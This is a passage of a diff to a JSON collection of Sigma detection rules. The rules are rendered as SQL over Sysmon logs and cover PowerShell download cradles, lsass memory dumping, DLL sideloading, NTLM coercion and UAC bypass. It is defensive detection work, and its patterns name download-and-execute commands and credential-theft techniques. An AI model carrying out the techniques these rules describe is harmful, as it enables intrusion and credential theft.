'%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" - }, - { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", + "attack.t1218.011", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ @@ -26290,4889 +26367,4783 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" - ], - "falsepositives": [ - "Inventory tool runs", - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" - }, - { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "falsepositives": [ - "Legitimate import of keys", - "Evernote" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" - ], - "filename": "proc_creation_win_regedit_import_keys.yml" - }, - { - "title": "File or Folder Permissions Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "status": "test", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "False positives are expected if VLC is installed in non-default locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE 